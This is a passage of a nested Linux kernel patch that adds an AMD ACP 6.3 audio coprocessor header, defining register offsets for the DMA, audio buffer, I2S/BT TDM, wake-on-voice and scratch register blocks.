+-#define ACP_P1_HS_TX_FIFOSIZE                         0x0003AC4
+-#define ACP_P1_HS_TX_DMA_SIZE                         0x0003AC8
+-#define ACP_P1_HS_TX_LINEARPOSITIONCNTR_HIGH          0x0003ACC
+-#define ACP_P1_HS_TX_LINEARPOSITIONCNTR_LOW           0x0003AD0
+-#define ACP_P1_HS_TX_INTR_WATERMARK_SIZE              0x0003AD4
+-
+-/* Registers from ACP_SCRATCH block */
+-#define ACP_SCRATCH_REG_0                             0x0010000
+-#define ACP_SCRATCH_REG_1                             0x0010004
+-#define ACP_SCRATCH_REG_2                             0x0010008
+-#define ACP_SCRATCH_REG_3                             0x001000C
+-#define ACP_SCRATCH_REG_4                             0x0010010
+-#define ACP_SCRATCH_REG_5                             0x0010014
+-#define ACP_SCRATCH_REG_6                             0x0010018
+-#define ACP_SCRATCH_REG_7                             0x001001C
+-#define ACP_SCRATCH_REG_8                             0x0010020
+-#define ACP_SCRATCH_REG_9                             0x0010024
+-#define ACP_SCRATCH_REG_10                            0x0010028
+-#define ACP_SCRATCH_REG_11                            0x001002C
+-#define ACP_SCRATCH_REG_12                            0x0010030
+-#define ACP_SCRATCH_REG_13                            0x0010034
+-#define ACP_SCRATCH_REG_14                            0x0010038
+-#define ACP_SCRATCH_REG_15                            0x001003C
+-#define ACP_SCRATCH_REG_16                            0x0010040
+-#define ACP_SCRATCH_REG_17                            0x0010044
+-#define ACP_SCRATCH_REG_18                            0x0010048
+-#define ACP_SCRATCH_REG_19                            0x001004C
+-#define ACP_SCRATCH_REG_20                            0x0010050
+-#define ACP_SCRATCH_REG_21                            0x0010054
+-#define ACP_SCRATCH_REG_22                            0x0010058
+-#define ACP_SCRATCH_REG_23                            0x001005C
+-#define ACP_SCRATCH_REG_24                            0x0010060
+-#define ACP_SCRATCH_REG_25                            0x0010064
+-#define ACP_SCRATCH_REG_26                            0x0010068
+-#define ACP_SCRATCH_REG_27                            0x001006C
+-#define ACP_SCRATCH_REG_28                            0x0010070
+-#define ACP_SCRATCH_REG_29                            0x0010074
+-#define ACP_SCRATCH_REG_30                            0x0010078
+-#define ACP_SCRATCH_REG_31                            0x001007C
+-#define ACP_SCRATCH_REG_32                            0x0010080
+-#define ACP_SCRATCH_REG_33                            0x0010084
+-#define ACP_SCRATCH_REG_34                            0x0010088
+-#define ACP_SCRATCH_REG_35                            0x001008C
+-#define ACP_SCRATCH_REG_36                            0x0010090
+-#define ACP_SCRATCH_REG_37                            0x0010094
+-#define ACP_SCRATCH_REG_38                            0x0010098
+-#define ACP_SCRATCH_REG_39                            0x001009C
+-#define ACP_SCRATCH_REG_40                            0x00100A0
+-#define ACP_SCRATCH_REG_41                            0x00100A4
+-#define ACP_SCRATCH_REG_42                            0x00100A8
+-#define ACP_SCRATCH_REG_43                            0x00100AC
+-#define ACP_SCRATCH_REG_44                            0x00100B0
+-#define ACP_SCRATCH_REG_45                            0x00100B4
+-#define ACP_SCRATCH_REG_46                            0x00100B8
+-#define ACP_SCRATCH_REG_47                            0x00100BC
+-#define ACP_SCRATCH_REG_48                            0x00100C0
+-#define ACP_SCRATCH_REG_49                            0x00100C4
+-#define ACP_SCRATCH_REG_50                            0x00100C8
+-#define ACP_SCRATCH_REG_51                            0x00100CC
+-#define ACP_SCRATCH_REG_52                            0x00100D0
+-#define ACP_SCRATCH_REG_53                            0x00100D4
+-#define ACP_SCRATCH_REG_54                            0x00100D8
+-#define ACP_SCRATCH_REG_55                            0x00100DC
+-#define ACP_SCRATCH_REG_56                            0x00100E0
+-#define ACP_SCRATCH_REG_57                            0x00100E4
+-#define ACP_SCRATCH_REG_58                            0x00100E8
+-#define ACP_SCRATCH_REG_59                            0x00100EC
+-#define ACP_SCRATCH_REG_60                            0x00100F0
+-#define ACP_SCRATCH_REG_61                            0x00100F4
+-#define ACP_SCRATCH_REG_62                            0x00100F8
+-#define ACP_SCRATCH_REG_63                            0x00100FC
+-#define ACP_SCRATCH_REG_64                            0x0010100
+-#define ACP_SCRATCH_REG_65                            0x0010104
+-#define ACP_SCRATCH_REG_66                            0x0010108
+-#define ACP_SCRATCH_REG_67                            0x001010C
+-#define ACP_SCRATCH_REG_68                            0x0010110
+-#define ACP_SCRATCH_REG_69                            0x0010114
+-#define ACP_SCRATCH_REG_70                            0x0010118
+-#define ACP_SCRATCH_REG_71                            0x001011C
+-#define ACP_SCRATCH_REG_72                            0x0010120
+-#define ACP_SCRATCH_REG_73                            0x0010124
+-#define ACP_SCRATCH_REG_74                            0x0010128
+-#define ACP_SCRATCH_REG_75                            0x001012C
+-#define ACP_SCRATCH_REG_76                            0x0010130
+-#define ACP_SCRATCH_REG_77                            0x0010134
+-#define ACP_SCRATCH_REG_78                            0x0010138
+-#define ACP_SCRATCH_REG_79                            0x001013C
+-#define ACP_SCRATCH_REG_80                            0x0010140
+-#define ACP_SCRATCH_REG_81                            0x0010144
+-#define ACP_SCRATCH_REG_82                            0x0010148
+-#define ACP_SCRATCH_REG_83                            0x001014C
+-#define ACP_SCRATCH_REG_84                            0x0010150
+-#define ACP_SCRATCH_REG_85                            0x0010154
+-#define ACP_SCRATCH_REG_86                            0x0010158
+-#define ACP_SCRATCH_REG_87                            0x001015C
+-#define ACP_SCRATCH_REG_88                            0x0010160
+-#define ACP_SCRATCH_REG_89                            0x0010164
+-#define ACP_SCRATCH_REG_90                            0x0010168
+-#define ACP_SCRATCH_REG_91                            0x001016C
+-#define ACP_SCRATCH_REG_92                            0x0010170
+-#define ACP_SCRATCH_REG_93                            0x0010174
+-#define ACP_SCRATCH_REG_94                            0x0010178
+-#define ACP_SCRATCH_REG_95                            0x001017C
+-#define ACP_SCRATCH_REG_96                            0x0010180
+-#define ACP_SCRATCH_REG_97                            0x0010184
+-#define ACP_SCRATCH_REG_98                            0x0010188
+-#define ACP_SCRATCH_REG_99                            0x001018C
+-#define ACP_SCRATCH_REG_100                           0x0010190
+-#define ACP_SCRATCH_REG_101                           0x0010194
+-#define ACP_SCRATCH_REG_102                           0x0010198
+-#define ACP_SCRATCH_REG_103                           0x001019C
+-#define ACP_SCRATCH_REG_104                           0x00101A0
+-#define ACP_SCRATCH_REG_105                           0x00101A4
+-#define ACP_SCRATCH_REG_106                           0x00101A8
+-#define ACP_SCRATCH_REG_107                           0x00101AC
+-#define ACP_SCRATCH_REG_108                           0x00101B0
+-#define ACP_SCRATCH_REG_109                           0x00101B4
+-#define ACP_SCRATCH_REG_110                           0x00101B8
+-#define ACP_SCRATCH_REG_111                           0x00101BC
+-#define ACP_SCRATCH_REG_112                           0x00101C0
+-#define ACP_SCRATCH_REG_113                           0x00101C4
+-#define ACP_SCRATCH_REG_114                           0x00101C8
+-#define ACP_SCRATCH_REG_115                           0x00101CC
+-#define ACP_SCRATCH_REG_116                           0x00101D0
+-#define ACP_SCRATCH_REG_117                           0x00101D4
+-#define ACP_SCRATCH_REG_118                           0x00101D8
+-#define ACP_SCRATCH_REG_119                           0x00101DC
+-#define ACP_SCRATCH_REG_120                           0x00101E0
+-#define ACP_SCRATCH_REG_121                           0x00101E4
+-#define ACP_SCRATCH_REG_122                           0x00101E8
+-#define ACP_SCRATCH_REG_123                           0x00101EC
+-#define ACP_SCRATCH_REG_124                           0x00101F0
+-#define ACP_SCRATCH_REG_125                           0x00101F4
+-#define ACP_SCRATCH_REG_126                           0x00101F8
+-#define ACP_SCRATCH_REG_127                           0x00101FC
+-#define ACP_SCRATCH_REG_128                           0x0010200
+-#endif
+diff --git a/include/sound/acp63_chip_offset_byte.h b/include/sound/acp63_chip_offset_byte.h
+new file mode 100644
+index 0000000000000..b02d0467c3cf4
+--- /dev/null
++++ b/include/sound/acp63_chip_offset_byte.h
+@@ -0,0 +1,444 @@
++/* SPDX-License-Identifier: GPL-2.0+ */
++/*
++ * AMD ACP 6.3 Register Documentation
++ *
++ * Copyright 2022 Advanced Micro Devices, Inc.
++ */
++
++#ifndef _acp_ip_OFFSET_HEADER
++#define _acp_ip_OFFSET_HEADER
++
++/* Registers from ACP_DMA block */
++#define ACP_DMA_CNTL_0                                0x0000000
++#define ACP_DMA_CNTL_1                                0x0000004
++#define ACP_DMA_CNTL_2                                0x0000008
++#define ACP_DMA_CNTL_3                                0x000000C
++#define ACP_DMA_CNTL_4                                0x0000010
++#define ACP_DMA_CNTL_5                                0x0000014
++#define ACP_DMA_CNTL_6                                0x0000018
++#define ACP_DMA_CNTL_7                                0x000001C
++#define ACP_DMA_DSCR_STRT_IDX_0                       0x0000020
++#define ACP_DMA_DSCR_STRT_IDX_1                       0x0000024
++#define ACP_DMA_DSCR_STRT_IDX_2                       0x0000028
++#define ACP_DMA_DSCR_STRT_IDX_3                       0x000002C
++#define ACP_DMA_DSCR_STRT_IDX_4                       0x0000030
++#define ACP_DMA_DSCR_STRT_IDX_5                       0x0000034
++#define ACP_DMA_DSCR_STRT_IDX_6                       0x0000038
++#define ACP_DMA_DSCR_STRT_IDX_7                       0x000003C
++#define ACP_DMA_DSCR_CNT_0                            0x0000040
++#define ACP_DMA_DSCR_CNT_1                            0x0000044
++#define ACP_DMA_DSCR_CNT_2                            0x0000048
++#define ACP_DMA_DSCR_CNT_3                            0x000004C
++#define ACP_DMA_DSCR_CNT_4                            0x0000050
++#define ACP_DMA_DSCR_CNT_5                            0x0000054
++#define ACP_DMA_DSCR_CNT_6                            0x0000058
++#define ACP_DMA_DSCR_CNT_7                            0x000005C
++#define ACP_DMA_PRIO_0                                0x0000060
++#define ACP_DMA_PRIO_1                                0x0000064
++#define ACP_DMA_PRIO_2                                0x0000068
++#define ACP_DMA_PRIO_3                                0x000006C
++#define ACP_DMA_PRIO_4                                0x0000070
++#define ACP_DMA_PRIO_5                                0x0000074
++#define ACP_DMA_PRIO_6                                0x0000078
++#define ACP_DMA_PRIO_7                                0x000007C
++#define ACP_DMA_CUR_DSCR_0                            0x0000080
++#define ACP_DMA_CUR_DSCR_1                            0x0000084
++#define ACP_DMA_CUR_DSCR_2                            0x0000088
++#define ACP_DMA_CUR_DSCR_3                            0x000008C
++#define ACP_DMA_CUR_DSCR_4                            0x0000090
++#define ACP_DMA_CUR_DSCR_5                            0x0000094
++#define ACP_DMA_CUR_DSCR_6                            0x0000098
++#define ACP_DMA_CUR_DSCR_7                            0x000009C
++#define ACP_DMA_CUR_TRANS_CNT_0                       0x00000A0
++#define ACP_DMA_CUR_TRANS_CNT_1                       0x00000A4
++#define ACP_DMA_CUR_TRANS_CNT_2                       0x00000A8
++#define ACP_DMA_CUR_TRANS_CNT_3                       0x00000AC
++#define ACP_DMA_CUR_TRANS_CNT_4                       0x00000B0
++#define ACP_DMA_CUR_TRANS_CNT_5                       0x00000B4
++#define ACP_DMA_CUR_TRANS_CNT_6                       0x00000B8
++#define ACP_DMA_CUR_TRANS_CNT_7                       0x00000BC
++#define ACP_DMA_ERR_STS_0                             0x00000C0
++#define ACP_DMA_ERR_STS_1                             0x00000C4
++#define ACP_DMA_ERR_STS_2                             0x00000C8
++#define ACP_DMA_ERR_STS_3                             0x00000CC
++#define ACP_DMA_ERR_STS_4                             0x00000D0
++#define ACP_DMA_ERR_STS_5                             0x00000D4
++#define ACP_DMA_ERR_STS_6                             0x00000D8
++#define ACP_DMA_ERR_STS_7                             0x00000DC
++#define ACP_DMA_DESC_BASE_ADDR                        0x00000E0
++#define ACP_DMA_DESC_MAX_NUM_DSCR                     0x00000E4
++#define ACP_DMA_CH_STS                                0x00000E8
++#define ACP_DMA_CH_GROUP                              0x00000EC
++#define ACP_DMA_CH_RST_STS                            0x00000F0
++
++/* Registers from ACP_AXI2AXIATU block */
++#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_1                0x0000C00
++#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_1                0x0000C04
++#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_2                0x0000C08
++#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_2                0x0000C0C
++#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_3                0x0000C10
++#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_3                0x0000C14
++#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_4                0x0000C18
++#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_4                0x0000C1C
++#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_5                0x0000C20
++#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_5                0x0000C24
++#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_6                0x0000C28
++#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_6                0x0000C2C
++#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_7                0x0000C30
++#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_7                0x0000C34
++#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_8                0x0000C38
++#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_8                0x0000C3C
++#define ACPAXI2AXI_ATU_CTRL                           0x0000C40
++#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_9                0x0000C44
++#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_9                0x0000C48
++#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_10               0x0000C4C
++#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_10               0x0000C50
++#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_11               0x0000C54
++#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_11               0x0000C58
++#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_12               0x0000C5C
++#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_12               0x0000C60
++#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_13               0x0000C64
++#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_13               0x0000C68
++#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_14               0x0000C6C
++#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_14               0x0000C70
++#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_15               0x0000C74
++#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_15               0x0000C78
++#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_16               0x0000C7C
++#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_16               0x0000C80
++
++/* Registers from ACP_CLKRST block */
++#define ACP_SOFT_RESET                                0x0001000
++#define ACP_CONTROL                                   0x0001004
++#define ACP_STATUS                                    0x0001008
++#define ACP_DYNAMIC_CG_MASTER_CONTROL                 0x0001010
++#define ACP_ZSC_DSP_CTRL                              0x0001014
++#define ACP_ZSC_STS                                   0x0001018
++#define ACP_PGFSM_CONTROL                             0x0001024
++#define ACP_PGFSM_STATUS                              0x0001028
++#define ACP_CLKMUX_SEL                                0x000102C
++
++/* Registers from ACP_AON block */
++#define ACP_PME_EN                                    0x0001400
++#define ACP_DEVICE_STATE                              0x0001404
++#define AZ_DEVICE_STATE                               0x0001408
++#define ACP_PIN_CONFIG                                0x0001440
++#define ACP_PAD_PULLUP_CTRL                           0x0001444
++#define ACP_PAD_PULLDOWN_CTRL                         0x0001448
++#define ACP_PAD_DRIVE_STRENGTH_CTRL                   0x000144C
++#define ACP_PAD_SCHMEN_CTRL                           0x0001450
++#define ACP_SW_PAD_KEEPER_EN                          0x0001454
++#define ACP_SW_WAKE_EN                                0x0001458
++#define ACP_I2S_WAKE_EN                               0x000145C
++#define ACP_SW1_WAKE_EN                               0x0001460
++
++/* Registers from ACP_P1_MISC block */
++#define ACP_EXTERNAL_INTR_ENB                         0x0001A00
++#define ACP_EXTERNAL_INTR_CNTL                        0x0001A04
++#define ACP_EXTERNAL_INTR_CNTL1                       0x0001A08
++#define ACP_EXTERNAL_INTR_STAT                        0x0001A0C
++#define ACP_EXTERNAL_INTR_STAT1                       0x0001A10
++#define ACP_ERROR_STATUS                              0x0001A4C
++#define ACP_P1_SW_I2S_ERROR_REASON                    0x0001A50
++#define ACP_P1_SW_POS_TRACK_I2S_TX_CTRL               0x0001A6C
++#define ACP_P1_SW_I2S_TX_DMA_POS                      0x0001A70
++#define ACP_P1_SW_POS_TRACK_I2S_RX_CTRL               0x0001A74
++#define ACP_P1_SW_I2S_RX_DMA_POS                      0x0001A78
++#define ACP_P1_DMIC_I2S_GPIO_INTR_CTRL                0x0001A7C
++#define ACP_P1_DMIC_I2S_GPIO_INTR_STATUS              0x0001A80
++#define ACP_SCRATCH_REG_BASE_ADDR                     0x0001A84
++#define ACP_P1_SW_POS_TRACK_BT_TX_CTRL                0x0001A88
++#define ACP_P1_SW_BT_TX_DMA_POS                       0x0001A8C
++#define ACP_P1_SW_POS_TRACK_HS_TX_CTRL                0x0001A90
++#define ACP_P1_SW_HS_TX_DMA_POS                       0x0001A94
++#define ACP_P1_SW_POS_TRACK_BT_RX_CTRL                0x0001A98
++#define ACP_P1_SW_BT_RX_DMA_POS                       0x0001A9C
++#define ACP_P1_SW_POS_TRACK_HS_RX_CTRL                0x0001AA0
++#define ACP_P1_SW_HS_RX_DMA_POS                       0x0001AA4
++
++/* Registers from ACP_AUDIO_BUFFERS block */
++#define ACP_I2S_RX_RINGBUFADDR                        0x0002000
++#define ACP_I2S_RX_RINGBUFSIZE                        0x0002004
++#define ACP_I2S_RX_LINKPOSITIONCNTR                   0x0002008
++#define ACP_I2S_RX_FIFOADDR                           0x000200C
++#define ACP_I2S_RX_FIFOSIZE                           0x0002010
++#define ACP_I2S_RX_DMA_SIZE                           0x0002014
++#define ACP_I2S_RX_LINEARPOSITIONCNTR_HIGH            0x0002018
++#define ACP_I2S_RX_LINEARPOSITIONCNTR_LOW             0x000201C
++#define ACP_I2S_RX_INTR_WATERMARK_SIZE                0x0002020
++#define ACP_I2S_TX_RINGBUFADDR                        0x0002024
++#define ACP_I2S_TX_RINGBUFSIZE                        0x0002028
++#define ACP_I2S_TX_LINKPOSITIONCNTR                   0x000202C
++#define ACP_I2S_TX_FIFOADDR                           0x0002030
++#define ACP_I2S_TX_FIFOSIZE                           0x0002034
++#define ACP_I2S_TX_DMA_SIZE                           0x0002038
++#define ACP_I2S_TX_LINEARPOSITIONCNTR_HIGH            0x000203C
++#define ACP_I2S_TX_LINEARPOSITIONCNTR_LOW             0x0002040
++#define ACP_I2S_TX_INTR_WATERMARK_SIZE                0x0002044
++#define ACP_BT_RX_RINGBUFADDR                         0x0002048
++#define ACP_BT_RX_RINGBUFSIZE                         0x000204C
++#define ACP_BT_RX_LINKPOSITIONCNTR                    0x0002050
++#define ACP_BT_RX_FIFOADDR                            0x0002054
++#define ACP_BT_RX_FIFOSIZE                            0x0002058
++#define ACP_BT_RX_DMA_SIZE                            0x000205C
++#define ACP_BT_RX_LINEARPOSITIONCNTR_HIGH             0x0002060
++#define ACP_BT_RX_LINEARPOSITIONCNTR_LOW              0x0002064
++#define ACP_BT_RX_INTR_WATERMARK_SIZE                 0x0002068
++#define ACP_BT_TX_RINGBUFADDR                         0x000206C
++#define ACP_BT_TX_RINGBUFSIZE                         0x0002070
++#define ACP_BT_TX_LINKPOSITIONCNTR                    0x0002074
++#define ACP_BT_TX_FIFOADDR                            0x0002078
++#define ACP_BT_TX_FIFOSIZE                            0x000207C
++#define ACP_BT_TX_DMA_SIZE                            0x0002080
++#define ACP_BT_TX_LINEARPOSITIONCNTR_HIGH             0x0002084
++#define ACP_BT_TX_LINEARPOSITIONCNTR_LOW              0x0002088
++#define ACP_BT_TX_INTR_WATERMARK_SIZE                 0x000208C
++#define ACP_HS_RX_RINGBUFADDR                         0x0002090
++#define ACP_HS_RX_RINGBUFSIZE                         0x0002094
++#define ACP_HS_RX_LINKPOSITIONCNTR                    0x0002098
++#define ACP_HS_RX_FIFOADDR                            0x000209C
++#define ACP_HS_RX_FIFOSIZE                            0x00020A0
++#define ACP_HS_RX_DMA_SIZE                            0x00020A4
++#define ACP_HS_RX_LINEARPOSITIONCNTR_HIGH             0x00020A8
++#define ACP_HS_RX_LINEARPOSITIONCNTR_LOW              0x00020AC
++#define ACP_HS_RX_INTR_WATERMARK_SIZE                 0x00020B0
++#define ACP_HS_TX_RINGBUFADDR                         0x00020B4
++#define ACP_HS_TX_RINGBUFSIZE                         0x00020B8
++#define ACP_HS_TX_LINKPOSITIONCNTR                    0x00020BC
++#define ACP_HS_TX_FIFOADDR                            0x00020C0
++#define ACP_HS_TX_FIFOSIZE                            0x00020C4
++#define ACP_HS_TX_DMA_SIZE                            0x00020C8
++#define ACP_HS_TX_LINEARPOSITIONCNTR_HIGH             0x00020CC
++#define ACP_HS_TX_LINEARPOSITIONCNTR_LOW              0x00020D0
++#define ACP_HS_TX_INTR_WATERMARK_SIZE                 0x00020D4
++
++/* Registers from ACP_I2S_TDM block */
++#define ACP_I2STDM_IER                                0x0002400
++#define ACP_I2STDM_IRER                               0x0002404
++#define ACP_I2STDM_RXFRMT                             0x0002408
++#define ACP_I2STDM_ITER                               0x000240C
++#define ACP_I2STDM_TXFRMT                             0x0002410
++#define ACP_I2STDM0_MSTRCLKGEN                        0x0002414
++#define ACP_I2STDM1_MSTRCLKGEN                        0x0002418
++#define ACP_I2STDM2_MSTRCLKGEN                        0x000241C
++#define ACP_I2STDM_REFCLKGEN                          0x0002420
++
++/* Registers from ACP_BT_TDM block */
++#define ACP_BTTDM_IER                                 0x0002800
++#define ACP_BTTDM_IRER                                0x0002804
++#define ACP_BTTDM_RXFRMT                              0x0002808
++#define ACP_BTTDM_ITER                                0x000280C
++#define ACP_BTTDM_TXFRMT                              0x0002810
++#define ACP_HSTDM_IER                                 0x0002814
++#define ACP_HSTDM_IRER                                0x0002818
++#define ACP_HSTDM_RXFRMT                              0x000281C
++#define ACP_HSTDM_ITER                                0x0002820
++#define ACP_HSTDM_TXFRMT                              0x0002824
++
++/* Registers from ACP_WOV block */
++#define ACP_WOV_PDM_ENABLE                            0x0002C04
++#define ACP_WOV_PDM_DMA_ENABLE                        0x0002C08
++#define ACP_WOV_RX_RINGBUFADDR                        0x0002C0C
++#define ACP_WOV_RX_RINGBUFSIZE                        0x0002C10
++#define ACP_WOV_RX_LINKPOSITIONCNTR                   0x0002C14
++#define ACP_WOV_RX_LINEARPOSITIONCNTR_HIGH            0x0002C18
++#define ACP_WOV_RX_LINEARPOSITIONCNTR_LOW             0x0002C1C
++#define ACP_WOV_RX_INTR_WATERMARK_SIZE                0x0002C20
++#define ACP_WOV_PDM_FIFO_FLUSH                        0x0002C24
++#define ACP_WOV_PDM_NO_OF_CHANNELS                    0x0002C28
++#define ACP_WOV_PDM_DECIMATION_FACTOR                 0x0002C2C
++#define ACP_WOV_PDM_VAD_CTRL                          0x0002C30
++#define ACP_WOV_WAKE                                  0x0002C54
++#define ACP_WOV_BUFFER_STATUS                         0x0002C58
++#define ACP_WOV_MISC_CTRL                             0x0002C5C
++#define ACP_WOV_CLK_CTRL                              0x0002C60
++#define ACP_PDM_VAD_DYNAMIC_CLK_GATING_EN             0x0002C64
++#define ACP_WOV_ERROR_STATUS_REGISTER                 0x0002C68
++#define ACP_PDM_CLKDIV                                0x0002C6C
++
++/* Registers from ACP_P1_AUDIO_BUFFERS block */
++#define ACP_P1_I2S_RX_RINGBUFADDR                     0x0003A00
++#define ACP_P1_I2S_RX_RINGBUFSIZE                     0x0003A04
++#define ACP_P1_I2S_RX_LINKPOSITIONCNTR                0x0003A08
++#define ACP_P1_I2S_RX_FIFOADDR                        0x0003A0C
++#define ACP_P1_I2S_RX_FIFOSIZE                        0x0003A10
++#define ACP_P1_I2S_RX_DMA_SIZE                        0x0003A14
++#define ACP_P1_I2S_RX_LINEARPOSITIONCNTR_HIGH         0x0003A18
++#define ACP_P1_I2S_RX_LINEARPOSITIONCNTR_LOW          0x0003A1C
++#define ACP_P1_I2S_RX_INTR_WATERMARK_SIZE             0x0003A20
++#define ACP_P1_I2S_TX_RINGBUFADDR                     0x0003A24
++#define ACP_P1_I2S_TX_RINGBUFSIZE                     0x0003A28
++#define ACP_P1_I2S_TX_LINKPOSITIONCNTR                0x0003A2C
++#define ACP_P1_I2S_TX_FIFOADDR                        0x0003A30
++#define ACP_P1_I2S_TX_FIFOSIZE                        0x0003A34
++#define ACP_P1_I2S_TX_DMA_SIZE                        0x0003A38
++#define ACP_P1_I2S_TX_LINEARPOSITIONCNTR_HIGH         0x0003A3C
++#define ACP_P1_I2S_TX_LINEARPOSITIONCNTR_LOW          0x0003A40
++#define ACP_P1_I2S_TX_INTR_WATERMARK_SIZE             0x0003A44
++#define ACP_P1_BT_RX_RINGBUFADDR                      0x0003A48
++#define ACP_P1_BT_RX_RINGBUFSIZE                      0x0003A4C
++#define ACP_P1_BT_RX_LINKPOSITIONCNTR                 0x0003A50
++#define ACP_P1_BT_RX_FIFOADDR                         0x0003A54
++#define ACP_P1_BT_RX_FIFOSIZE                         0x0003A58
++#define ACP_P1_BT_RX_DMA_SIZE                         0x0003A5C
++#define ACP_P1_BT_RX_LINEARPOSITIONCNTR_HIGH          0x0003A60
++#define ACP_P1_BT_RX_LINEARPOSITIONCNTR_LOW           0x0003A64
++#define ACP_P1_BT_RX_INTR_WATERMARK_SIZE              0x0003A68
++#define ACP_P1_BT_TX_RINGBUFADDR                      0x0003A6C
++#define ACP_P1_BT_TX_RINGBUFSIZE                      0x0003A70
++#define ACP_P1_BT_TX_LINKPOSITIONCNTR                 0x0003A74
++#define ACP_P1_BT_TX_FIFOADDR                         0x0003A78
++#define ACP_P1_BT_TX_FIFOSIZE                         0x0003A7C
++#define ACP_P1_BT_TX_DMA_SIZE                         0x0003A80
++#define ACP_P1_BT_TX_LINEARPOSITIONCNTR_HIGH          0x0003A84
++#define ACP_P1_BT_TX_LINEARPOSITIONCNTR_LOW           0x0003A88
++#define ACP_P1_BT_TX_INTR_WATERMARK_SIZE              0x0003A8C
++#define ACP_P1_HS_RX_RINGBUFADDR                      0x0003A90
++#define ACP_P1_HS_RX_RINGBUFSIZE                      0x0003A94
++#define ACP_P1_HS_RX_LINKPOSITIONCNTR                 0x0003A98
++#define ACP_P1_HS_RX_FIFOADDR                         0x0003A9C
++#define ACP_P1_HS_RX_FIFOSIZE                         0x0003AA0
++#define ACP_P1_HS_RX_DMA_SIZE                         0x0003AA4
++#define ACP_P1_HS_RX_LINEARPOSITIONCNTR_HIGH          0x0003AA8
++#define ACP_P1_HS_RX_LINEARPOSITIONCNTR_LOW           0x0003AAC
++#define ACP_P1_HS_RX_INTR_WATERMARK_SIZE              0x0003AB0
++#define ACP_P1_HS_TX_RINGBUFADDR                      0x0003AB4
++#define ACP_P1_HS_TX_RINGBUFSIZE                      0x0003AB8
++#define ACP_P1_HS_TX_LINKPOSITIONCNTR                 0x0003ABC
++#define ACP_P1_HS_TX_FIFOADDR                         0x0003AC0
++#define ACP_P1_HS_TX_FIFOSIZE                         0x0003AC4
++#define ACP_P1_HS_TX_DMA_SIZE                         0x0003AC8
++#define ACP_P1_HS_TX_LINEARPOSITIONCNTR_HIGH          0x0003ACC
++#define ACP_P1_HS_TX_LINEARPOSITIONCNTR_LOW           0x0003AD0
++#define ACP_P1_HS_TX_INTR_WATERMARK_SIZE              0x0003AD4
++
++/* Registers from ACP_SCRATCH block */
++#define ACP_SCRATCH_REG_0                             0x0010000
++#define ACP_SCRATCH_REG_1                             0x0010004
++#define ACP_SCRATCH_REG_2                             0x0010008
++#define ACP_SCRATCH_REG_3                             0x001000C
++#define ACP_SCRATCH_REG_4                             0x0010010
++#define ACP_SCRATCH_REG_5                             0x0010014
++#define ACP_SCRATCH_REG_6                             0x0010018
++#define ACP_SCRATCH_REG_7                             0x001001C
++#define ACP_SCRATCH_REG_8                             0x0010020
++#define ACP_SCRATCH_REG_9                             0x0010024
++#define ACP_SCRATCH_REG_10                            0x0010028
++#define ACP_SCRATCH_REG_11                            0x001002C
++#define ACP_SCRATCH_REG_12                            0x0010030
++#define ACP_SCRATCH_REG_13                            0x0010034
++#define ACP_SCRATCH_REG_14                            0x0010038
++#define ACP_SCRATCH_REG_15                            0x001003C
++#define ACP_SCRATCH_REG_16                            0x0010040
++#define ACP_SCRATCH_REG_17                            0x0010044
++#define ACP_SCRATCH_REG_18                            0x0010048
++#define ACP_SCRATCH_REG_19                            0x001004C
++#define ACP_SCRATCH_REG_20                            0x0010050
++#define ACP_SCRATCH_REG_21                            0x0010054
++#define ACP_SCRATCH_REG_22                            0x0010058
++#define ACP_SCRATCH_REG_23                            0x001005C
++#define ACP_SCRATCH_REG_24                            0x0010060
++#define ACP_SCRATCH_REG_25                            0x0010064
++#define ACP_SCRATCH_REG_26                            0x0010068
++#define ACP_SCRATCH_REG_27                            0x001006C
++#define ACP_SCRATCH_REG_28                            0x0010070
++#define ACP_SCRATCH_REG_29                            0x0010074
++#define ACP_SCRATCH_REG_30                            0x0010078
++#define ACP_SCRATCH_REG_31                            0x001007C
++#define ACP_SCRATCH_REG_32                            0x0010080
++#define ACP_SCRATCH_REG_33                            0x0010084
++#define ACP_SCRATCH_REG_34                            0x0010088
++#define ACP_SCRATCH_REG_35                            0x001008C
++#define ACP_SCRATCH_REG_36                            0x0010090
++#define ACP_SCRATCH_REG_37                            0x0010094
++#define ACP_SCRATCH_REG_38                            0x0010098
++#define ACP_SCRATCH_REG_39                            0x001009C
++#define ACP_SCRATCH_REG_40                            0x00100A0
++#define ACP_SCRATCH_REG_41                            0x00100A4
++#define ACP_SCRATCH_REG_42                            0x00100A8
++#define ACP_SCRATCH_REG_43                            0x00100AC
++#define ACP_SCRATCH_REG_44                            0x00100B0
++#define ACP_SCRATCH_REG_45                            0x00100B4
++#define ACP_SCRATCH_REG_46                            0x00100B8
++#define ACP_SCRATCH_REG_47                            0x00100BC
++#define ACP_SCRATCH_REG_48                            0x00100C0
++#define ACP_SCRATCH_REG_49                            0x00100C4
++#define ACP_SCRATCH_REG_50                            0x00100C8
